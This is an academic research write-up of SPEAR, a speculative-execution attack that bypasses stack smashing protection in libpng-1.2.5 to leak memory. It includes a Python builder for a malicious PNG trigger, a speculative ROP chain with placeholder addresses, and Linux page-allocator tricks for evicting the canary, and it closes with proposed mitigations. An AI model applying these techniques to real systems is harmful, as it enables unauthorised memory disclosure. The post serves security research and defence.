SPEAR attacks - stack smashing protector bypass usecase

Authors: Alexandra, Andrea, Alessandro, Anil

Topics: security, transient-execution

Bypassing stack smashing protection through speculative control flow hijacking #

This work demonstrates a local arbitrary read attack through speculative control flow hijacking against an image processing server. The victim uses libpng-1.2.5, which is vulnerable to CVE-2004-0597 [1], a stack buffer overflow vulnerability. Traditional exploitation is blocked when the library is built with stack smashing protection (SSP). However, not only does SSP fail to protect against speculative control flow hijacking, it also provides primitives which facilitate the end-to-end attack.

Alongside the SSP speculative control flow hijacking attack, our extended work covers an entire class of attacks which we refer to as SPEculative ARchitectural control flow hijacks, or SPEAR. In the SPEAR classification, the SSP attack falls into the category of speculative control flow hijacks based on an architectural overwrite of a backward edge.

Extended work

Background: bypassing stack smashing protection #

SSP is a mitigation against traditional stack buffer overflow attacks. Its design is simple: in each function prologue, write a randomly generated value (the canary) on the stack between the area allocated for local variables and the saved return address. Unless the attacker can leak the canary value prior to the attack, a linear stack buffer overflow exploit fails because the function epilogue checks the integrity of the canary and crashes the program if the check fails.

Nonetheless, the SSP mechanism does not prevent an attacker from running the exploit speculatively when the outcome of the canary integrity check is mispredicted. To understand why stack smashing protection is subject to a Spectre attack, we show the SSP code generated by GCC and Clang.

func:
    prologue

; Store canary on the stack
    mov rbx, QWORD[fs:0x28]
    mov QWORD[stack_canary], rbx
    ...
    body
    ...
; Check for a corrupted canary; abort on mismatch
    mov rbx, QWORD[stack_canary]
    xor rbx, QWORD[fs:0x28]
    je exit
    call __stack_chk_fail
exit:
    epilogue
    ret

In the above snippet, the outcome of the xor instruction sets the appropriate flags subsequently used by the conditional jump instruction to decide on aborting or returning to the caller. A misprediction of that conditional branch when a buffer overflow did occur leads to speculative execution of instructions at the overwritten return address.

Background: from theoretical to practical Spectre #

Unlike existing PoC attacks against Spectre-type vulnerabilities, which employ artificial methods to satisfy these conditions, we analyze the preconditions required for a successful Spectre attack and describe ways of achieving them in a real-world environment, against a real-world target. We identify three attack preconditions:

  1. a large enough speculation window: the attacker typically achieves this by evicting the data required to determine the outcome of the conditional branch. The attacker must thus be able to evict arbitrary victim data from all cache levels (achieved in synthetic PoCs via clflush or similar instructions)
  2. the availability of an arbitrary read primitive; it must be part of the victim’s code and must execute inside the speculation window (synthetic PoCs usually compile the primitive together with the victim code)
  3. a reliable side-channel; the most common choice is the CPU cache, whose state is changed by the arbitrary read primitive in such a way that the attacker can later read the signal (the least noisy option, often used in synthetic PoCs, is a shared memory area between attacker and victim)

These preconditions apply to all Spectre-type attacks, including SPEAR.

We discuss our solutions for each precondition in Exploit strategy. Before discussing the strategy, the next section describes the stack buffer overflow vulnerability which is exploited by this attack through speculative SSP bypass.

libpng-1.2.5: stack buffer overflow #

The stack buffer overflow vulnerability that we picked is shown below.

void /* PRIVATE */
png_handle_tRNS(png_structp png_ptr, png_infop info_ptr, png_uint_32 length)
{
  ...
  png_byte readbuf[PNG_MAX_PALETTE_LENGTH];
  ...
  if (png_ptr->color_type == PNG_COLOR_TYPE_PALETTE) {
    if (!(png_ptr->mode & PNG_HAVE_PLTE))
    {
     /* Should be an error, but we can cope with it */
     png_warning(png_ptr, "Missing PLTE before tRNS");
    }
    ...
    png_crc_read(png_ptr, readbuf, (png_size_t)length);
    png_ptr->num_trans = (png_uint_16)length;
  }
  ...
}

The png_handle_tRNS function (handling of the transparency chunk) allocates a stack buffer and fills it with attacker-controlled data. The number of bytes copied to the stack buffer is determined by the length parameter, which is also attacker-controlled. As shown in the snippet, in the isolated case when no PLTE (the palette chunk) was found before calling png_handle_tRNS, the length check against the maximum stack buffer size is missing, allowing the attacker to write a payload well beyond the buffer limit (>2000 B).
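To make the trigger concrete, the following sketch builds a minimal malicious PNG stream containing an oversized tRNS chunk and no preceding PLTE chunk. It only illustrates the chunk layout that reaches the vulnerable code path, not a complete working exploit:

```python
# Sketch (not a working exploit): build a PNG whose tRNS chunk declares a
# length larger than PNG_MAX_PALETTE_LENGTH (256), reaching the overflow in
# png_handle_tRNS when no PLTE chunk precedes it.
import struct, zlib

def chunk(ctype: bytes, data: bytes) -> bytes:
    """Serialize one PNG chunk: length, type, data, CRC over type+data."""
    return (struct.pack(">I", len(data)) + ctype + data
            + struct.pack(">I", zlib.crc32(ctype + data) & 0xFFFFFFFF))

PNG_MAGIC = b"\x89PNG\r\n\x1a\n"

# IHDR: 1x1 image, bit depth 8, color type 3 (palette), so that
# png_handle_tRNS takes the PNG_COLOR_TYPE_PALETTE branch.
ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 3, 0, 0, 0)

payload = b"A" * 2048          # attacker payload, far beyond the 256 B readbuf
evil_png = (PNG_MAGIC
            + chunk(b"IHDR", ihdr)
            + chunk(b"tRNS", payload)   # no PLTE chunk before tRNS
            + chunk(b"IEND", b""))
```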

This vulnerability is not exploitable when the library is compiled with SSP. Such an attempt results in a program abort due to a canary mismatch, thwarting the attack.

Exploit strategy #

We make use of the speculation window between the canary integrity check misprediction and the program abort to speculatively run the attacker-controlled payload, bypassing the memory corruption exploitation barrier imposed by SSP.

We run an end-to-end exploit against the SSP-protected stack buffer overflow in png_handle_tRNS. Unlike traditional exploits, where the attacker simply crafts the right payload and sends it to the victim, here we must additionally satisfy the following attack preconditions:

  1. The CPU must mispredict the stack canary integrity check
  2. A large speculation window must be available (obtained by evicting the stack canary from all cache levels before the png_handle_tRNS canary check)

For the first precondition, we rely on Pattern History Table (PHT) training using a simple yet effective approach: prior to the attack, we repeatedly send the victim correct PNG files to parse, so that the branch predictor learns the “correct canary” outcome rather than the “hijacked canary” one.

For the second precondition, we exploit the kernel page frame allocation mechanism so that it hands the victim a formerly attacker-controlled page frame on which to place its canary. Prior to the attack, we find the correct eviction sets for that page using FLUSH+RELOAD. The outcome of this method is a successful stack canary eviction using precomputed eviction sets.

Building the arbitrary read primitive #

Assuming we already have a long enough speculation window to run the attack payload, the next challenge is to find an arbitrary read primitive. We choose to disclose victim data through the cache side-channel. To place the victim data in the cache (side-channel send), the attacker tricks the victim into speculatively running a Spectre v1-type gadget. Subsequently, the attacker obtains the victim data from cache (side-channel receive) by probing the shared memory area for cached data.

Spectre v1 gadgets are scarce, but they are simple enough to be built by chaining together ROP gadgets. At a high level, the Spectre v1 gadget performs an array access. The array usually has 256 entries so that it covers all byte values. The size of each array entry is 256 B [2]. The low-level code for the Spectre v1 gadget is shown below.

; Place array and index in registers
mov rax, [base_loc]
mov rdx, [index_loc]
; Multiply by 256
shl rdx, 8
; Compute final address
add rax, rdx
; Array element access
mov rsi, [rax]

Given the reduced complexity of this gadget, we found the building blocks of the Spectre v1 gadget in different setups with different success rates. The code sources include libc, libpthread and libpng. We detail the ROP gadget restrictions imposed by speculative execution in Speculative ROP.
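The gadget's address arithmetic can be modeled numerically. The sketch below (hypothetical base address, no real memory access) just checks that a 256 B stride encodes one secret byte into an address and that the receiver can decode it:

```python
# Toy model of the Spectre v1 gadget's address arithmetic: the transiently
# touched address encodes one secret byte with a 256 B stride, matching the
# `shl rdx, 8` in the gadget above.
ARRAY_ELEM_SIZE = 256

def send_address(array_base: int, secret_byte: int) -> int:
    """Address touched by the speculative array access."""
    assert 0 <= secret_byte <= 0xFF
    return array_base + (secret_byte << 8)   # base + 256 * secret

def recover_byte(array_base: int, touched_addr: int) -> int:
    """Side-channel receive: which 256 B slot was brought into the cache?"""
    return (touched_addr - array_base) >> 8

base = 0x7F0000000000                        # hypothetical shared-array base
addr = send_address(base, 0x41)
assert recover_byte(base, addr) == 0x41
```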

Exploit summary #

(Figure: overview of the end-to-end attack steps)

The above scheme shows an overview of the steps required to perform the end-to-end attack. The attack has a preparation phase (Steps 1 and 2), where eviction sets (to ensure the existence of a suitably long speculation window) are identified, memory used by the side channel is flushed and ROP gadgets are primed in the instruction cache. The attacker then submits the payload to the victim in Step 3, crafted to exploit the stack buffer overflow. Traditional exploitation of the memory safety violation is prevented by SSP. However, the attacker uses a speculative execution attack to bypass the mechanism by overwriting the return address, and obtaining a speculative control flow hijack (Step 5). As a result, the victim is tricked into executing a side-channel send of attacker-chosen memory in Step 6: this is achieved with the ROP component, which reuses code snippets from the victim program, appropriately selected and primed in the initialisation phase. The attacker can then execute the corresponding side-channel receive in Step 7. The success rate of the attack is increased by concurrently executing an eviction loop to lengthen the speculation window (Step 4) with previously computed eviction sets for the stack canary.

Stack canary eviction #

The first step of the attack is finding the correct eviction sets for victim stack canary. The sets are subsequently used during the eviction loop in Step 4, contributing to the SPEAR + ROP attack phases executed in Step 5 and Step 6. The victim stack canary eviction causes a cache miss during the canary value load when the execution reaches the canary integrity check, thus giving the attacker a large enough speculation window for the SPEAR (SPEculative ARchitectural control flow hijacking) attack.

To address canary eviction, we devised a novel approach to evicting victim data, since existing methods incur a high penalty on the success of the ROP execution (Step 6). Our method has the advantage of being non-intrusive and noise-free compared with state-of-the-art cache eviction solutions. We optimized the number of cache sets touched in Step 4 to be the bare minimum, namely a single cache set in each slice (8 cache sets in total) [3], therefore limiting the chances of accidentally evicting attack-crucial data, such as the ROP gadgets or the side-channel send signal.
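Eviction-set candidates are sets of addresses congruent in their set-index bits. A minimal sketch of that congruence, assuming the experiment machine's cache configuration (8 MB LLC, 8 slices, 64 B lines) plus an assumed 16-way associativity; the undocumented slice hash is ignored here and resolved empirically in Step 1 of the real attack:

```python
# Sketch of set-index congruence for building LLC eviction-set candidates.
# Geometry assumptions: 8 MB LLC, 8 slices, 64 B lines, 16-way associative.
LINE = 64
WAYS = 16          # assumption; not stated in the post
SLICES = 8
LLC_BYTES = 8 * 1024 * 1024
SETS_PER_SLICE = LLC_BYTES // (LINE * WAYS * SLICES)   # 1024 sets per slice

def set_index(paddr: int) -> int:
    # Set index lives just above the 6 line-offset bits of the address.
    return (paddr >> 6) % SETS_PER_SLICE

# WAYS addresses congruent modulo SETS_PER_SLICE * LINE map to the same set
# (same-slice membership must still be verified empirically).
target = 0x1234540
congruent = [target + i * SETS_PER_SLICE * LINE for i in range(WAYS)]
assert all(set_index(a) == set_index(target) for a in congruent)
```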

The stack canary eviction consists of three phases. The first phase corresponds to Step 1, finding the eviction set for the canary, and takes place in a preparatory stage of the attack (the victim instance that we target has not started yet). We use two processes for the attack, A1 and A2, which can communicate through some channel (we picked shared memory). A2 is compiled with SSP. The A2 canary eviction set detection loop runs synchronously in A1 and A2: the former sequentially loads each possible LLC eviction set while the latter performs FLUSH+RELOAD on its canary. For exactly one eviction set, A2 encounters a cache miss and reports it to A1. As a result, A1 obtains the LLC eviction set corresponding to A2’s canary location [4].

The rest of the canary eviction method is based on the observation that the page frame used to store A2’s canary, the TLS page [5], can subsequently be used by other processes in the system, in some cases for the same purpose.

The second phase of canary eviction forces A2’s TLS page to be reused by the target victim instance. Due to the deterministic behaviour of the Linux page allocator, the attacker can rely on page reuse with a 100% success rate when the victim process is exec'd by an attacker-controlled process [6].

Abusing the Linux page allocator #

The TLS page reuse is a crucial part of the attack since it facilitates non-intrusive canary value eviction during the attack. We arrived at this method after studying how process loading requests resources, namely page frames, from the operating system (OS). We observed during our experiments that identical Page Frame Numbers (PFNs) sometimes show up across independent process runs.

We characterized the OS page frame handling through in-depth analysis of allocation and deallocation during process startup and exit. We first discuss page frame deallocation so that we can draw conclusions about the blocks of free pages managed by the allocator. Subsequently, we show how page frames are retrieved from the blocks of free pages during an allocation request. The blocks of free pages correspond to an internal kernel structure: an array of linked lists organized by block size (a power-of-two number of pages). Each linked list is referred to as the n-order free list, where n is the exponent of the power-of-two block size [7]. In this attack it suffices to manipulate the 0-order free list.

Page frame deallocation happens when a process drops part of its virtual memory (madvise, munmap) or releases all of it (exec, exit). The deallocation order in the latter case is decided by unmap_vmas [8]: page frames are released in ascending order of their corresponding virtual addresses. This also applies to the former case, although the order in which the memory chunks are dropped contributes to the free-list layout.

The final order in which page frames are placed in the free list is descending, because of the subsequent LIFO (Last In, First Out) release from the TLB (Translation Lookaside Buffer).

Knowing the deallocator behaviour, we craft the attacker virtual memory space in such a way that the target TLS page lands at a fixed location in the 0-order free list after the attacker memory is deallocated. We refer to the index of this fixed location in the 0-order free list as K. K is chosen such that, when the victim process requests the page frame for its TLS page, the Kth node of the 0-order free list is the attacker-controlled page frame. Prior to the attack, K’s value is determined by tracing victim allocations in a simulated attack: we start the victim binary under perf and record all page frame allocations and deallocations [9].
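A toy model of the 0-order free list illustrates how K works. It deliberately ignores per-CPU page caches and higher-order lists, keeping only the LIFO head behaviour described above; the PFNs and the value of K are made up:

```python
# Toy model of the 0-order free list (LIFO): freed page frames are pushed on
# the list head, so the Kth allocation after exec returns the frame sitting
# K nodes from the top.
class FreeList0:
    def __init__(self):
        self.head = []
    def free(self, pfn: int):
        self.head.insert(0, pfn)      # push: last freed frame sits on top
    def alloc(self) -> int:
        return self.head.pop(0)       # pop from the head

fl = FreeList0()
K = 3                                  # hypothetical traced index
attacker_pfns = [100, 101, 102, 103, 104]
# The frame freed (K+1)th from the end lands at index K after the pushes.
TARGET = attacker_pfns[len(attacker_pfns) - 1 - K]
for pfn in attacker_pfns:              # attacker (A2) releases its memory
    fl.free(pfn)
# Victim startup: the (K+1)th page-sized allocation receives the target frame.
got = [fl.alloc() for _ in range(K + 1)]
assert got[K] == TARGET
```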

In the case of the TLS page, we were able to reuse the attacker page in every attempt. This does not hold for every page a program allocates: for example, the success rate drops when the target page is among the first pages claimed by the loader, or when the target page is requested after victim memory deallocations.

Wrapping up canary eviction #

We demonstrate the attack against an attacker-spawned (exec’d) victim because this setup allows full control over victim startup after placing the attacker-controlled page in the right 0-order free list spot.

We start the target victim by placing it inside the running context of the attacker-controlled process A2, with execv. Prior to this, A2 performs the number of page-sized allocations dictated by K’s value, to achieve TLS page reuse after execv. The syscall drops the full memory layout of the running process (A2) and replaces it with the memory layout of the victim, but in such a way that the corresponding physical page frames assigned by the OS are returned in the attacker-desired order. Our method guarantees that the TLS page which contained the canary value of A2 now contains the canary value of the target victim, therefore A1 can evict the victim canary value (Step 4) by loading the eviction sets computed in Step 1.

Speculative ROP #

The canary eviction ensures a long enough speculation window inside of which we run the attack payload (Step 6). The payload is composed of carefully chosen ROP gadgets which are prepared as part of the initialization in Step 1.

Spectre v1 side-channel send gadget #

We briefly mentioned in the background section that the main purpose of the payload is to leak arbitrary victim data. The arbitrary read primitive used by this attack is the Spectre v1-type gadget built by chaining together ROP gadgets, since the victim memory space does not provide a ready-to-use one.

The Spectre v1 gadget is essentially an array access where array_base and scale are fixed. The only variable is array_index, which represents the value of one victim secret byte. Thus, the purpose of the ROP chain is to:

  1. Compute the array address

mov array_index, [victim_secret_address]
address = array_base + scale x array_index

  2. Load the address contents to transmit the side-channel send signal

mov reg, [address]

For computing the Spectre v1 array address, we look for two

pop reg; ret;

gadgets which place victim_secret_address and array_base in registers. We assume both addresses are known [10], therefore they can be popped from the stack and used for subsequent computations. The next step dereferences victim_secret_address to obtain array_index, achieved with a register dereference gadget

mov reg0, [reg1]; ret;

The next gadget is an arithmetic or logic operation used to multiply array_index by scale. The most commonly encountered variant is:

shl reg0, 8; ret;

Lastly, we need another register/address dereference gadget to perform the side-channel send.

We found different working versions of the ROP chain in different libraries including libc, libpthread and libpng. For the exact ROP gadgets we use for the PoC, please refer to our paper.
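The chain can be illustrated by packing it into the payload words that overwrite the saved return address. All gadget and data addresses below are hypothetical placeholders, not the actual PoC gadgets (for those, see the paper); note that six gadget addresses plus two data words make up the chain:

```python
# Illustrative packing of the speculative ROP chain. Addresses are made-up
# placeholders; a real chain uses gadgets found in the victim's mapped
# libraries (libc, libpthread, libpng).
import struct

POP_RDI_RET = 0x7F0000001111   # pop rdi; ret
DEREF_RET   = 0x7F0000002222   # mov rdi, [rdi]; ret
SHL_RDI_RET = 0x7F0000003333   # shl rdi, 8; ret
POP_RSI_RET = 0x7F0000004444   # pop rsi; ret
ADD_RDI_RSI = 0x7F0000005555   # add rdi, rsi; ret
SEND_RET    = 0x7F0000006666   # mov rax, [rdi]; ret  (side-channel send)

SECRET_ADDR = 0x7F00DEAD0000   # victim address to leak (ASLR assumed off)
ARRAY_BASE  = 0x7F00BEEF0000   # shared side-channel array base

chain = [POP_RDI_RET, SECRET_ADDR,   # rdi = &secret
         DEREF_RET,                  # rdi = 8-byte load containing the secret
                                     # byte (a real chain must account for
                                     # the extra bytes loaded)
         SHL_RDI_RET,                # rdi = value * 256
         POP_RSI_RET, ARRAY_BASE,    # rsi = array base
         ADD_RDI_RSI,                # rdi = base + 256 * value
         SEND_RET]                   # touch array slot, caching it

payload = struct.pack("<%dQ" % len(chain), *chain)  # overwrites saved RIP
```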

Constraints #

Traditionally, code reuse attacks can use gadgets from any executable page which is mapped in memory, independent of the runtime state of the page. However, for a ROP gadget to successfully execute speculatively, the gadget must reside in a virtual page with a valid TLB mapping. Moreover, an icache miss shortens the speculative window for the subsequent ROP gadgets, therefore a cached gadget increases the side-channel send success.

To address the first constraint, we built a speculative ROP gadget finding tool based on ROPgadget. The purpose of the tool is to determine all code pages which were physically mapped during runtime and reduce the ROP gadget search space to those pages. To achieve this, we simulate the attack against the victim inside gdb and collect the execution traces. The traces help find the code pages which have a corresponding TLB mapping by the time of the attack [11]. We then restrict ROPgadget to search for gadgets only in the code pages previously found.
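The page-filtering step of such a tool can be sketched as follows. The trace and candidate addresses here are made-up illustrations; real input would come from the gdb execution trace and the ROPgadget output:

```python
# Sketch: restrict candidate gadget addresses to code pages observed
# executing in the traced simulated attack, since only pages with a live
# TLB mapping are usable during speculative execution.
PAGE = 0x1000

def filter_gadgets(candidates, traced_addrs):
    """Keep gadgets whose page appeared in the execution trace."""
    mapped = {addr & ~(PAGE - 1) for addr in traced_addrs}
    return [g for g in candidates if (g & ~(PAGE - 1)) in mapped]

# Hypothetical data: the trace hits two pages; three candidate gadgets.
trace = [0x7F0000001080, 0x7F0000003FF0]
cands = [0x7F0000001111, 0x7F0000002222, 0x7F0000003333]
usable = filter_gadgets(cands, trace)   # drops the gadget on page ...2000
```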

The second constraint, a cached ROP chain, is handled in Step 2 by the ROP initialization phase. Subsequently, after Step 3 (sending the payload), the attacker starts a process co-located with the victim which accesses the ROP chain in a loop, ensuring a low number of icache misses during speculative ROP.

Speculative ROP is a powerful tool to have in speculative execution attacks. As proof, we achieved arbitrary read with only 6 gadgets. However, speculative ROP is not trivial to set up due to the constraints detailed above (TLB/icache misses effects on speculative window size). Moreover, any slight change in the environment may compromise the attack success (unlike traditional ROP where similar gadgets can be found in different setups).

The side channel #

In the previous section we discussed sending side-channel signals through speculative ROP. For the channel itself, the attack uses the de facto option in speculative execution attacks, namely the FLUSH+RELOAD cache side-channel, although other side-channels would work as well. The cache side-channel can use any memory region shared between attacker and victim as the side-channel array (e.g. any dynamic library used by the victim program). The constraints on the shared space are its size (at least 64 KB) and its noise level: the attacker may prefer a shared library which is not accessed in close time proximity to the attack. For convenience, in this attack we chose libpthread as the side-channel array.

The side-channel array is primed by the attacker immediately after Step 3 by flushing all array elements from all cache levels. In Step 7, the attacker probes the array to read the side-channel signal sent by speculative ROP. The result is one victim secret byte leaked.
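A minimal simulation of the receive side: after the speculative send, exactly one 256 B slot reloads fast. The 80-cycle hit threshold is a machine-dependent assumption, and real code would time each reload (e.g. with rdtsc) instead of using the simulated values below:

```python
# Sketch of the side-channel receive (Step 7) on simulated access times:
# the slot cached by the victim's speculative send reloads below the
# hit threshold, revealing the leaked byte value.
CACHE_HIT_THRESHOLD = 80   # cycles; machine-dependent assumption

def probe(reload_times):
    """Return byte values whose array slot reloaded fast (i.e. was cached)."""
    return [b for b, t in enumerate(reload_times) if t < CACHE_HIT_THRESHOLD]

# Simulated timings: slot 0x41 was touched by the speculative send.
times = [200] * 256
times[0x41] = 40
leaked = probe(times)   # [0x41]
```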

The arbitrary read primitive provided by SPEAR allows leaking one byte from an arbitrary victim memory address per attack run. In real-world scenarios, adversaries need more than one byte to take over accounts or escalate privileges, so we measured the effectiveness of the attack on leaking a secret byte sequence tens of bytes long. Due to various noise sources, the success rate of the attack is 7.19% ± 0.62% (mean over 100 runs with a 95% confidence interval), so we take between 10 and 100 samples per secret byte. In this setup, we achieve an end-to-end leakage rate of 0.3 bytes per second.
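As a sanity check on these numbers, a quick geometric-distribution estimate (assuming independent runs at the measured 7.19% per-run success rate) shows why a budget of 10 to 100 samples per byte is sensible:

```python
# Back-of-the-envelope sampling budget: with per-run success probability p,
# the expected number of runs until the first successful leak is 1/p, and
# n runs succeed at least once with probability 1 - (1 - p)**n.
p = 0.0719
expected_runs = 1 / p              # roughly 14 runs per byte on average
p_100 = 1 - (1 - p) ** 100         # chance of success within 100 samples
assert 10 < expected_runs < 100
assert p_100 > 0.99                # 100 samples almost always suffice
```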

Mitigations #

This attack works on Linux machines with all system-level Spectre mitigations enabled; the SPEAR class of attacks is not affected by Spectre v2 mitigations. Since SPEAR leverages the branches which test for memory integrity, mitigations must be applied at the application level. We thus benchmark two possible mitigations: one based on lfence and one based on masking sensitive metadata (e.g. array index, return address, forward edge). The lfence mitigation incurs a high overhead (the highest recorded being 100%) and, although endorsed by other research work, we suggest using the alternative. The overhead of the masking-based mitigation is still not negligible, yet it did not exceed 13% in our benchmarks. The benchmarks, together with the benchmarking methods and platforms, are presented in detail in the paper.

One important aspect of the mitigations we propose against SPEAR is that they protect only the application code which asserts memory integrity. In the case of SSP, the mitigations target the canary integrity check executed in each function epilogue. We conclude that SPEAR attacks can be obstructed without comprehensive mitigations against Spectre v1, therefore reducing the performance penalty.

Conclusion #

We investigated architectural speculative control flow hijacking (the SPEAR variant), which exploits and bypasses stack smashing protection, a mitigation against classic buffer overflow exploitation, to leak information from a local victim. Moreover, we demonstrated a practical attack against SSP, a mechanism which is supposed to protect software against the exploitation of memory corruption flaws, drawing the conclusion that existing mitigations are incomplete in the Spectre era.

Together with SSP, we investigated memory safe languages (Go, Rust), Clang CFI and GCC VTV. Apart from Clang CFI, all of the mentioned mechanisms are feasible SPEAR targets, due to potential misprediction of security-critical integrity checks. We propose a low overhead mitigation against SPEAR which masks sensitive metadata (array index, return address, forward edge) prior to the integrity check, hindering SPEAR effects when a misprediction occurs.

For more information about SPEAR attacks, please refer to our paper.

Endnotes #

  1. We chose this particular CVE because it provides a large enough out-of-bounds write to fit the attack payload. In practice, a stack buffer overflow that only allows overwriting the return address is sufficient, in combination with stack pivoting. 

  2. In the original Spectre paper, each element size is equal to PAGE_SIZE, to avoid probing noise. The noise comes from adjacent cache lines being fetched together with the requested line. We experimented with different element sizes until we reached 256 B, which keeps probing noise low and at the same time keeps the probing area relatively small (16 pages). 

  3. Cache internals are not the subject of this post, however it is important to describe the cache configuration of the experiment machine. The LLC (Last Level Cache) is 8 MB in size. The CPU has 4 physical cores, therefore 8 logical ones. As the latest research claims and our experiments confirm, the number of corresponding LLC slices is 8. 

  4. LLC organization is based on the physical memory location of data. 

  5. The TLS page is allocated at load time by _dl_allocate_tls_storage as part of the SSP initialization. The page allocation is followed by the generation of the canary value by _dl_setup_stack_chk_guard.

  6. For completeness, we analyzed both attacker-controlled and independent victim startup scenarios. Apart from the attacker-exec’d victim (attacker controlled), we characterised page reuse when: a) the victim process is a child of an attacker-controlled process; b) the victim process is independent. The attacker-controlled victim startup results in a 100% success rate for the TLS page reuse if the attacker process can manipulate its runtime virtual memory space via mmap. Forcing a page reuse in an independent process in the system (case b) depends on the attacker’s ability to track the victim’s allocations. In Linux, the default behaviour allows monitoring (via /proc) the resident memory size of other processes with a granularity of 66 pages [12].

  7. For more on Linux allocator internals go here

  8. The call stack which leads to unmap_vmas depends on the initial action (exit, execv, munmap, madvise) of the userspace process. 

  9. We obtained the call stacks by catching memory allocator events (mm_page_alloc, mm_page_free) using perf.

  10. ASLR (Address Space Layout Randomization) bypass is not covered by this work, so we consider ASLR disabled. For a discussion on this matter, please refer to the paper.

  11. The TLB is subject to replacement policies, thus not all pages returned by the tool have a valid TLB entry. We may end up with false positives, though the TLB size allows enough ROP gadget search space to build the Spectre v1 gadget. 

  12. Linux asynchronously updates the resident set size (RSS) via sync_mm_rss when enough events (page faults) occurred. The number of events chosen is 64 (TASK_RSS_EVENTS_THRESH), however, the RSS monitoring granularity found by our experiments is 66. The code checks if the counter is > 64, meaning that 65 events already happened. Next, the counter is incremented to count the current event (=>66). Lastly, sync_mm_rss is called. 
